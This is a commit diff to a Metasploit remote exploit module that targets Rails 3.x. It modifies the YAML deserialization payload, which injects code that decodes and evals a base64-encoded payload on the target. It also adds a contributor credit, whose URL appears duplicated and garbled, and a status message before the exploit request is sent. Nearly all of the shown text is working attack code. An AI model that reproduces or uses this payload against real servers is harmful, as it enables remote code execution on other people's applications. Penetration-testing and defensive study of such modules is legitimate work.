This restores functionality across all rails 3.x

bug/bundler_fix
HD Moore 2013-01-10 00:28:12 -06:00
parent 0e92de8f61
commit acabc14ec3
1 changed files with 7 additions and 3 deletions

View File

@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
'charlisome', # PoC
'espes', # PoC and Metasploit module
'toothfairy', # Anonymous contributor
'hdm' # Module merge/conversion/payload work
'hdm', # Module merge/conversion/payload work
'Postmodern' # The __END__ trick from https:https://gist.github.com/4499206//gist.github.com/4499206
],
'License' => MSF_LICENSE,
'References' =>
@ -87,8 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'; (eval(%[#{code}].unpack(%[m0])[0]); @e=true) unless @e #':" +
" !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
yaml
end
@ -137,6 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def exploit
data = build_request
print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],